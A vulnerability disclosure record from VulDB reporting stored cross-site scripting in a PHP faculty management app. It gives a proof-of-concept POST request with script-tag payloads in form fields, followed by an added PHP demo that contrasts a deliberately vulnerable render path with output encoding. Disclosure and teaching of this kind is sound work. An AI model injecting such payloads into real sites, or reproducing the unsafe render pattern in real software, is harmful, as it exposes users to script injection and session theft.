Submit #255820: code-projects.org Faculty Management System 1 Stored Cross-Site Scripting

Title: code-projects.org Faculty Management System 1 Stored Cross-Site Scripting
Description: Stored XSS in http://localhost/gan/admin/pages/yearlevel.php.

Vulnerable software: https://code-projects.org/faculty-management-system-in-php-with-source-code/

Vulnerable request:

    POST /gan/admin/php/crud.php HTTP/1.1
    Host: localhost
    Content-Length: 88
    sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/gan/admin/pages/yearlevel.php
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Cookie: fusion7k868_session=0qfpifmqa21t89g6fft0a53hs9; fusion7k868_visited=yes; REFERRER=http%3A%2F%2Flocalhost%2Forangescrum-main%2F; user_uniq_agent=81fa84b75a8024ba76b34e57df459f314694749926581a53872d4b; USERSUB_TYPE=0; IS_MODERATOR=0; SES_ROLE=1; FIRST_INVITE_2=1; CPUID=ac57356acee38e7adfdfe2af0a14fe91; CURRENT_FILTER=cases; DEFAULT_PAGE=dashboard; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; helpdesk_uniq_agent=-1; PHPSESSID=n7ed4n8j05ckj8m7f8npi75pd5
    Connection: close

    action=validate-section&section=<script>alert()</script>&grade=<script>alert(1)</script>

Vulnerable file: admin/php/crud.php, lines 82-84:

    $year = sanitized($_POST['year']);
    $section = sanitized($_POST['section']);
    $data = array('year_level'=>$year,'section'=>$section);
Source: https://drive.google.com/file/d/1s2kLMjnUvlrD_XocoDl3-ABrWYTo5Azd/view?usp=sharing
User: kerkroups (UID 59969)
Submission: 12/20/2023 19:31
Moderation: 12/21/2023 17:17 (22 hours later)
Status: Accepted
VulDB entry: 248744 [code-projects Faculty Management System 1.0 yearlevel.php Year Level/Section cross site scripting]
Points: 20
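Added example (not code from the Faculty Management System, from code-projects.org, or from the submitter): a stand-alone PHP script that models the store path quoted from admin/php/crud.php and a render path of the kind yearlevel.php would use, to show why an input filter such as sanitized() does not stop stored XSS and how HTML-encoding at the point of output does. The sanitized() stand-in, the in-memory table, the two render functions and the request body are constructed for this example; the project's real sanitized() is not reproduced, and the payload is placed in the 'section' parameter because that is the field the quoted lines read.

```php
<?php
declare(strict_types=1);

// Added example, not the project's code. Models the store path quoted from
// admin/php/crud.php (lines 82-84) and a render path for yearlevel.php.

// ASSUMPTION: the project's sanitized() is not reproduced. This stand-in does
// what such helpers in small PHP apps typically do: trim and escape for SQL.
// Neither step touches '<' or '>', so HTML tags survive unchanged.
function sanitized(string $value): string
{
    // addslashes() stands in for mysqli_real_escape_string(), which needs a
    // live connection; both leave '<script>' intact.
    return addslashes(trim($value));
}

// Store path, same shape as the quoted lines: filter, build the row, insert.
// $table is an in-memory stand-in for the year_level table.
function storeSection(array &$table, array $post): array
{
    $year    = sanitized($post['year'] ?? '');
    $section = sanitized($post['section'] ?? '');
    $data    = ['year_level' => $year, 'section' => $section];
    $table[] = $data;
    return $data;
}

// Vulnerable render: stored values interpolated straight into the page.
function renderUnsafe(array $table): string
{
    $html = "<table>\n";
    foreach ($table as $row) {
        $html .= "<tr><td>{$row['year_level']}</td><td>{$row['section']}</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Hardened render: encode at the point of output, for the HTML text context.
// ENT_QUOTES also encodes ' and " so the same helper is safe inside attribute
// values; data placed into a <script> block or a URL needs its own encoder.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderSafe(array $table): string
{
    $html = "<table>\n";
    foreach ($table as $row) {
        $html .= '<tr><td>' . e($row['year_level']) . '</td><td>'
               . e($row['section']) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Constructed request body. The quoted code reads 'year' and 'section', so the
// payload from the submitted request is placed in 'section' here.
$post = ['year' => '1', 'section' => '<script>alert(1)</script>'];

$yearLevelTable = [];
storeSection($yearLevelTable, $post);

$unsafe = renderUnsafe($yearLevelTable);
$safe   = renderSafe($yearLevelTable);

echo "--- unsafe render ---\n", $unsafe, "--- hardened render ---\n", $safe;

// Self-check: the live tag survives the unsafe path, and only the unsafe path.
if (!str_contains($unsafe, '<script>alert(1)</script>')) {
    throw new RuntimeException('expected the payload to survive the unsafe render');
}
if (str_contains($safe, '<script>') ||
    !str_contains($safe, '&lt;script&gt;alert(1)&lt;/script&gt;')) {
    throw new RuntimeException('hardened render leaked or mangled the payload');
}
echo "checks passed\n";
```

Run it with `php example.php` (PHP 8 or later for str_contains). The point of encoding at output rather than stripping at input is that the stored value is rendered as data in whatever context it lands in; a filter applied once at crud.php protects only the contexts its author anticipated, while yearlevel.php, exports and any other page reading the same row remain exposed.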
